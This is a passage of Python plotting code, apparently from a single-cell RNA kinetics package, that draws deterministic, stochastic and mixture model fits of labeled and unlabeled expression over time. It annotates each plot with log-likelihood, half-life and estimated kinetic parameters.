    observed data (box plots when `show_variance`, dashed mean lines otherwise),
    the fitted curves, optional ground-truth curves `true_p` (red) when
    `true_param_prefix` is given, and text with logLL, half-life and the
    estimated (and, if known, true) alpha/beta/gamma parameters.
    Returns the (mutated) GridSpec `gs`.
    """
    import matplotlib.pyplot as plt
    true_alpha, true_beta, true_gamma = true_params
    alpha, beta, gamma = est_params
    # Limit the time axis to at most 6 tick positions.
    if len(T_uniq) > 6:
        xticks, xticks_labels = (
            np.round(np.linspace(0, max(T_uniq), 6), 2),
            np.round(np.linspace(0, max(T_uniq), 6), 2),
        )
    else:
        xticks, xticks_labels = T_uniq, T_uniq
    # Pick smoothed (M_*) layers when available, otherwise raw (X_*) layers.
    if has_splicing:
        if "M_ul" in adata.layers.keys() and use_smoothed:
            title_ = ["M_ul", "M_sl"]
            layers = ["M_ul", "M_sl", "M_uu", "M_su"]
            layer_u, layer_s = "M_ul", "M_sl"
        else:
            title_ = ["X_ul", "X_sl"]
            layers = ["X_ul", "X_sl", "X_uu", "X_su"]
            layer_u, layer_s = "X_ul", "X_sl"
        _, X_raw = prepare_data_has_splicing(
            adata,
            genes,
            T,
            layer_u=layer_u,
            layer_s=layer_s,
            total_layers=layers,
        )
    else:
        if "M_t" in adata.layers.keys() and use_smoothed:
            title_ = ["M_n"]
            total_layer = "M_t"
            layer = "M_n"
        else:
            title_ = ["X_new"]
            total_layer = "X_total"
            layer = "X_new"
        _, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
    # Shift the info text right when box plots are not drawn, so it clears the y-axis.
    padding = 0.185 if not show_variance else 0
    for i, gene_name in enumerate(genes):
        cur_X_data, cur_X_fit_data, cur_logLL = (
            X_data[i],
            X_fit_data[i],
            logLL[i],
        )
        for j in range(sub_plot_n):
            row_ind = int(np.floor(i / ncols))  # make sure unlabled and labeled are in the same column.
            col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
            row_i, col_i = np.where(fig_mat == col_loc)
            ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
            if j == 0:
                # Annotate the first subplot with logLL and the gamma-derived half-life.
                ax.text(
                    0.01 + padding,
                    0.80,
                    r"$logLL={0:.2f}$".format(cur_logLL)
                    + " \n"
                    + r"$t_{1/2} = $"
                    + "{0:.2f}".format(np.log(2) / gamma[i])
                    + unit[0],
                    ha="left",
                    va="top",
                    transform=ax.transAxes,
                )
                if show_kin_parameters:
                    if true_param_prefix is not None:
                        if has_splicing:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\alpha$"
                                + ": {0:.2f}; ".format(true_alpha[i])
                                + r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\beta$"
                                + ": {0:.2f}; ".format(true_beta[i])
                                + r"$\hat \beta$"
                                + ": {0:.2f} \n".format(beta[i])
                                + r"$\gamma$"
                                + ": {0:.2f}; ".format(true_gamma[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                        else:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\alpha$"
                                + ": {0:.2f}; ".format(true_alpha[i])
                                + r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\gamma$"
                                + ": {0:.2f}; ".format(true_gamma[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                    else:
                        if has_splicing:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\hat \beta$"
                                + ": {0:.2f} \n".format(beta[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                        else:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
            if show_variance:
                if has_splicing:
                    Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
                else:
                    # NOTE(review): sparsity is tested on X_raw[i][0] but .A is taken on
                    # X_raw[i] — looks inconsistent; confirm against prepare_data_no_splicing.
                    Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
                ax.boxplot(
                    x=[Obs[T == std] for std in T_uniq],
                    positions=T_uniq,
                    widths=boxwidth,
                    showfliers=False,
                    showmeans=True,
                )
                if has_splicing:
                    ax.plot(T_uniq, cur_X_fit_data[j], "b")
                    ax.plot(T_uniq, cur_X_data[j], "k--")
                else:
                    ax.plot(T_uniq, cur_X_fit_data.flatten(), "b")
                    ax.plot(T_uniq, cur_X_data.flatten(), "k--")
                ax.set_title(gene_name + " (" + title_[j] + ")")
            else:
                ax.plot(T_uniq, cur_X_fit_data.T)
                ax.legend(title_)
                ax.plot(T_uniq, cur_X_data.T, "k--")
                ax.set_title(gene_name)
            # properly set the xticks
            ax.set_xticks(xticks)
            ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
            if true_param_prefix is not None:
                # NOTE(review): both branches are identical; the has_splicing split is redundant here.
                if has_splicing:
                    ax.plot(t, true_p[j], "r")
                else:
                    ax.plot(t, true_p[j], "r")
            ax.set_xlabel("time (" + unit + ")")
            if y_log_scale:
                ax.set_yscale("log")
            if log_unnormalized:
                ax.set_ylabel("Expression (log)")
            else:
                ax.set_ylabel("Expression")
    return gs
def plot_kin_sto(
    adata,
    genes,
    has_splicing,
    use_smoothed,
    log_unnormalized,
    t,
    T,
    T_uniq,
    unit,
    X_data,
    X_fit_data,
    logLL,
    true_p,
    grp_len,
    sub_plot_n,
    ncols,
    boxwidth,
    gs,
    fig_mat,
    gene_order,
    y_log_scale,
    true_param_prefix,
    true_params,
    est_params,
    show_moms_fit,
    show_variance,
    show_kin_parameters,
):
    """Draw per-gene subplots of a stochastic (moment-based) kinetic-model fit.

    Same layout and annotations as `plot_kin_det`, but the stochastic model also
    fits second moments; when `show_moms_fit` is True, extra subplots show those
    second-moment fits as line plots. First-moment subplots use box plots of the
    observations when `show_variance`, dashed lines otherwise.
    Returns the (mutated) GridSpec `gs`.
    """
    import matplotlib.pyplot as plt
    true_alpha, true_beta, true_gamma = true_params
    alpha, beta, gamma = est_params
    # Limit the time axis to at most 6 tick positions.
    if len(T_uniq) > 6:
        xticks, xticks_labels = (
            np.round(np.linspace(0, max(T_uniq), 6), 2),
            np.round(np.linspace(0, max(T_uniq), 6), 2),
        )
    else:
        xticks, xticks_labels = T_uniq, T_uniq
    # Pick smoothed (M_*) layers when available; append moment titles if requested.
    if has_splicing:
        if "M_ul" in adata.layers.keys() and use_smoothed:
            title_ = ["M_ul", "M_sl", "M_ul2", "M_sl2", "M_ul_sl"] if show_moms_fit else ["M_ul", "M_sl"]
            layers = ["M_ul", "M_sl", "M_uu", "M_su"]
            layer_u, layer_s = "M_ul", "M_sl"
        else:
            title_ = ["X_ul", "X_sl", "X_ul2", "X_sl2", "X_ul_sl"] if show_moms_fit else ["X_ul", "X_sl"]
            layers = ["X_ul", "X_sl", "X_uu", "X_su"]
            layer_u, layer_s = "X_ul", "X_sl"
        _, X_raw = prepare_data_has_splicing(
            adata,
            genes,
            T,
            layer_u=layer_u,
            layer_s=layer_s,
            total_layers=layers,
        )
    else:
        if "M_t" in adata.layers.keys() and use_smoothed:
            title_ = ["M_n", "M_n2"] if show_moms_fit else ["M_n"]
            total_layer = "M_t"
            layer = "M_n"
        else:
            title_ = ["new", "n2"] if show_moms_fit else ["new"]
            total_layer = "total"
            layer = "new"
        _, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
    # Shift the info text right when box plots are not drawn, so it clears the y-axis.
    padding = 0.185 if not show_variance else 0
    for i, gene_name in enumerate(genes):
        cur_X_data, cur_X_fit_data, cur_logLL = (
            X_data[i],
            X_fit_data[i],
            logLL[i],
        )
        for j in range(sub_plot_n):
            row_ind = int(np.floor(i / ncols))  # make sure unlabled and labeled are in the same column.
            col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
            row_i, col_i = np.where(fig_mat == col_loc)
            ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
            if j == 0:
                # Annotate the first subplot with logLL and the gamma-derived half-life.
                ax.text(
                    0.01 + padding,
                    0.80,
                    r"$logLL={0:.2f}$".format(cur_logLL)
                    + " \n"
                    + r"$t_{1/2} = $"
                    + "{0:.2f}".format(np.log(2) / gamma[i])
                    + unit[0],
                    ha="left",
                    va="top",
                    transform=ax.transAxes,
                )
                if show_kin_parameters:
                    if true_param_prefix is not None:
                        if has_splicing:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\alpha$"
                                + ": {0:.2f}; ".format(true_alpha[i])
                                + r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\beta$"
                                + ": {0:.2f}; ".format(true_beta[i])
                                + r"$\hat \beta$"
                                + ": {0:.2f} \n".format(beta[i])
                                + r"$\gamma$"
                                + ": {0:.2f}; ".format(true_gamma[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                        else:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\alpha$"
                                + ": {0:.2f}; ".format(true_alpha[i])
                                + r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\gamma$"
                                + ": {0:.2f}; ".format(true_gamma[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                    else:
                        if has_splicing:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\hat \beta$"
                                + ": {0:.2f} \n".format(beta[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                        else:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
            # Only the first-moment subplots (u/s labeled, or new) get box plots.
            max_box_plots = 2 if has_splicing else 1
            # if show_variance first plot box plot
            if show_variance:
                if j < max_box_plots:
                    if has_splicing:
                        Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
                    else:
                        # NOTE(review): sparsity is tested on X_raw[i][0] but .A is taken on
                        # X_raw[i] — looks inconsistent; confirm against prepare_data_no_splicing.
                        Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
                    ax.boxplot(
                        x=[Obs[T == std] for std in T_uniq],
                        positions=T_uniq,
                        widths=boxwidth,
                        showfliers=False,
                        showmeans=True,
                    )
                    ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
                    ax.plot(T_uniq, cur_X_data[j], "k--")
                    ax.set_title(gene_name + " (" + title_[j] + ")")
            # if not show_variance then first plot line plot
            else:
                if j == 0:
                    if has_splicing:
                        ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
                        ax.legend(title_[:2])
                        ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
                    else:
                        ax.plot(T_uniq, cur_X_fit_data[j].T)
                        ax.legend([title_[0]])
                        ax.plot(T_uniq, cur_X_data[j].T, "k--")
                    ax.set_title(gene_name)
            # other subplots
            if not ((show_variance and j < max_box_plots) or (not show_variance and j == 0)):
                ax.plot(T_uniq, cur_X_fit_data[j].T)
                ax.plot(T_uniq, cur_X_data[j], "k--")
                if show_variance:
                    ax.legend([title_[j]])
                else:
                    if has_splicing:
                        ax.legend([title_[j + 1]])
                    else:
                        ax.legend([title_[j]])
                ax.set_title(gene_name)
            # properly set the xticks
            ax.set_xticks(xticks)
            ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
            if true_param_prefix is not None:
                ax.plot(t, true_p[j], "r")
            ax.set_xlabel("time (" + unit + ")")
            if y_log_scale:
                ax.set_yscale("log")
            if log_unnormalized:
                ax.set_ylabel("Expression (log)")
            else:
                ax.set_ylabel("Expression")
    return gs
def plot_kin_mix(
    adata,
    genes,
    has_splicing,
    use_smoothed,
    log_unnormalized,
    t,
    T,
    T_uniq,
    unit,
    X_data,
    X_fit_data,
    logLL,
    true_p,
    grp_len,
    sub_plot_n,
    ncols,
    boxwidth,
    gs,
    fig_mat,
    gene_order,
    y_log_scale,
    true_param_prefix,
    true_params,
    est_params,
    show_variance,
    show_kin_parameters,
):
    """Draw per-gene subplots of a mixture kinetic-model fit (labeled + unlabeled species).

    Same layout and annotations as `plot_kin_det`, but both the labeled and the
    pre-existing (old/unlabeled) species are shown: with splicing that is
    ul/sl/uu/su, without splicing new/old (prepare_data_no_splicing is called
    with return_old=True). Box plots are drawn for the first species when
    `show_variance`; otherwise paired line plots.
    Returns the (mutated) GridSpec `gs`.
    """
    import matplotlib.pyplot as plt
    true_alpha, true_beta, true_gamma = true_params
    alpha, beta, gamma = est_params
    # Limit the time axis to at most 6 tick positions.
    if len(T_uniq) > 6:
        xticks, xticks_labels = (
            np.round(np.linspace(0, max(T_uniq), 6), 2),
            np.round(np.linspace(0, max(T_uniq), 6), 2),
        )
    else:
        xticks, xticks_labels = T_uniq, T_uniq
    # Pick smoothed (M_*) layers when available, otherwise raw layers.
    if has_splicing:
        if "M_ul" in adata.layers.keys() and use_smoothed:
            title_ = ["M_ul", "M_sl", "M_uu", "M_su"]
            layers = ["M_ul", "M_sl", "M_uu", "M_su"]
            layer_u, layer_s = "M_ul", "M_sl"
        else:
            title_ = ["X_ul", "X_sl", "X_uu", "X_su"]
            layers = ["X_ul", "X_sl", "X_uu", "X_su"]
            layer_u, layer_s = "X_ul", "X_sl"
        _, X_raw = prepare_data_has_splicing(
            adata,
            genes,
            T,
            layer_u=layer_u,
            layer_s=layer_s,
            total_layers=layers,
        )
    else:
        if "M_t" in adata.layers.keys() and use_smoothed:
            title_ = ["M_n", "M_o"]
            total_layer = "M_t"
            layer = "M_n"
        else:
            title_ = ["new", "old"]
            total_layer = "total"
            layer = "new"
        _, X_raw = prepare_data_no_splicing(
            adata,
            adata.var.index,
            T,
            layer=layer,
            total_layer=total_layer,
            return_old=True,
        )
    # Shift the info text right when box plots are not drawn, so it clears the y-axis.
    padding = 0.185 if not show_variance else 0
    for i, gene_name in enumerate(genes):
        cur_X_data, cur_X_fit_data, cur_logLL = (
            X_data[i],
            X_fit_data[i],
            logLL[i],
        )
        for j in range(sub_plot_n):
            row_ind = int(np.floor(i / ncols))  # make sure unlabled and labeled are in the same column.
            col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
            row_i, col_i = np.where(fig_mat == col_loc)
            ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
            if j == 0:
                # Annotate the first subplot with logLL and the gamma-derived half-life.
                ax.text(
                    0.01 + padding,
                    0.80,
                    r"$logLL={0:.2f}$".format(cur_logLL)
                    + " \n"
                    + r"$t_{1/2} = $"
                    + "{0:.2f}".format(np.log(2) / gamma[i])
                    + unit[0],
                    ha="left",
                    va="top",
                    transform=ax.transAxes,
                )
                if show_kin_parameters:
                    if true_param_prefix is not None:
                        if has_splicing:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\alpha$"
                                + ": {0:.2f}; ".format(true_alpha[i])
                                + r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\beta$"
                                + ": {0:.2f}; ".format(true_beta[i])
                                + r"$\hat \beta$"
                                + ": {0:.2f} \n".format(beta[i])
                                + r"$\gamma$"
                                + ": {0:.2f}; ".format(true_gamma[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                        else:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\alpha$"
                                + ": {0:.2f}; ".format(true_alpha[i])
                                + r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\gamma$"
                                + ": {0:.2f}; ".format(true_gamma[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                    else:
                        if has_splicing:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\hat \beta$"
                                + ": {0:.2f} \n".format(beta[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
                        else:
                            ax.text(
                                0.01 + padding,
                                0.99,
                                r"$\hat \alpha$"
                                + ": {0:.2f} \n".format(alpha[i])
                                + r"$\hat \gamma$"
                                + ": {0:.2f} \n".format(gamma[i]),
                                ha="left",
                                va="top",
                                transform=ax.transAxes,
                            )
            max_box_plots = 2 if has_splicing else 1
            max_line_plots = 2 if has_splicing else 1
            # if show_variance first plot box plot
            if show_variance:
                if j < max_box_plots:
                    # NOTE(review): both branches below are identical; the split looks redundant.
                    if has_splicing:
                        Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
                    else:
                        Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
                    ax.boxplot(
                        x=[Obs[T == std] for std in T_uniq],
                        positions=T_uniq,
                        widths=boxwidth,
                        showfliers=False,
                        showmeans=True,
                    )
                    ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
                    ax.plot(T_uniq, cur_X_data[j], "k--")
                    ax.set_title(gene_name + " (" + title_[j] + ")")
            # if not show_variance then first plot line plot
            else:
                if has_splicing:
                    if j == 0:
                        ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
                        ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
                        ax.legend(title_[:2])
                    elif j == 1:
                        ax.plot(T_uniq, cur_X_fit_data[[2, 3]].T)
                        ax.plot(T_uniq, cur_X_data[[2, 3]].T, "k--")
                        ax.legend(title_[2:4])
                    ax.set_title(gene_name)
                else:
                    if j == 0:
                        ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
                        ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
                        ax.legend(title_[:2])
                    ax.set_title(gene_name)
            # other subplots
            if not ((show_variance and j < max_box_plots) or (not show_variance and j < max_line_plots)):
                ax.plot(T_uniq, cur_X_fit_data[j].T)
                ax.plot(T_uniq, cur_X_data[j], "k--")
                if show_variance:
                    ax.legend([title_[j]])
                else:
                    if has_splicing:
                        ax.legend([title_[j + 2]])
                    else:
                        ax.legend([title_[j + 1]])
                ax.set_title(gene_name)
            # properly set the xticks
            ax.set_xticks(xticks)
            ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
            if true_param_prefix is not None:
                ax.plot(t, true_p[j], "r")
            ax.set_xlabel("time (" + unit + ")")
            if y_log_scale:
                ax.set_yscale("log")
            if log_unnormalized:
                ax.set_ylabel("Expression (log)")
            else:
                ax.set_ylabel("Expression")
    return gs
def plot_kin_mix_det_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = (
["M_ul", "M_sl", "M_uu", "M_su", "M_uu2", "M_su2", "M_uu_su"]
if show_moms_fit
else ["M_ul", "M_sl", "M_uu", "M_su"]
)
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
else:
title_ = (
["X_ul", "X_sl", "X_uu", "X_su", "X_uu2", "X_su2", "X_uu_su"]
if show_moms_fit
else ["X_ul", "X_sl", "X_uu", "X_su"]
)
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
_, X_raw = prepare_data_mix_has_splicing(
adata,
adata.var.index,
T,
layer_u=layers[2],
layer_s=layers[3],
layer_ul=layers[0],
layer_sl=layers[1],
total_layers=layers,
mix_model_indices=[0, 1, 5, 6, 7, 8, 9],
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_o", "M_o2"] if show_moms_fit else ["M_n", "M_o"]
layers = ["M_n", "M_t"]
total_layer = "M_t"
else:
title_ = ["X_new", "X_old", "X_o2"] if show_moms_fit else ["X_new", "X_old"]
layers = ["X_new", "X_total"]
total_layer = "X_total"
_, X_raw = prepare_data_mix_no_splicing(
adata,
adata.var.index,
T,
layer_n=layers[0],
layer_t=layers[1],
total_layer=total_layer,
mix_model_indices=[0, 2, 3],
)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 4 if has_splicing else 2
max_line_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if has_splicing:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
elif j == 1:
ax.plot(T_uniq, cur_X_fit_data[[2, 3]].T)
ax.plot(T_uniq, cur_X_data[[2, 3]].T, "k--")
ax.legend(title_[2:4])
ax.set_title(gene_name)
else:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j < max_line_plots)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 2]])
else:
ax.legend([title_[j + 1]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_mix_sto_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = (
[
"M_ul",
"M_sl",
"M_uu",
"M_su",
"M_ul2",
"M_sl2",
"M_ul_sl",
"M_uu2",
"M_su2",
"M_uu_su",
]
if show_moms_fit
else ["M_ul", "M_sl", "M_uu", "M_su"]
)
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
else:
title_ = (
[
"X_ul",
"X_sl",
"X_uu",
"X_su",
"X_ul2",
"X_sl2",
"X_ul_sl",
"X_uu2",
"X_su2",
"X_uu_su",
]
if show_moms_fit
else ["X_ul", "X_sl", "X_uu", "X_su"]
)
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
reorder_inds = [0, 1, 5, 6, 2, 3, 4, 7, 8, 9]
_, X_raw = prepare_data_mix_has_splicing(
adata,
adata.var.index,
T,
layer_u=layers[2],
layer_s=layers[3],
layer_ul=layers[0],
layer_sl=layers[1],
total_layers=layers,
mix_model_indices=reorder_inds,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_o", "M_n2", "M_o2"] if show_moms_fit else ["M_n", "M_o"]
total_layer = "M_t"
layers = ["M_n", "M_t"]
else:
title_ = ["X_new", "X_old", "X_n2", "X_o2"] if show_moms_fit else ["X_new", "X_old"]
total_layer = "X_total"
layers = ["X_new", "X_total"]
reorder_inds = [0, 2, 1, 3]
_, X_raw = prepare_data_mix_no_splicing(
adata,
adata.var.index,
T,
layer_n=layers[0],
layer_t=layers[1],
total_layer=total_layer,
mix_model_indices=reorder_inds,
)
padding = 0.185 if not show_variance else 0
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
cur_X_fit_data = cur_X_fit_data[reorder_inds]
cur_X_data = cur_X_data[reorder_inds]
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.01 + padding,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
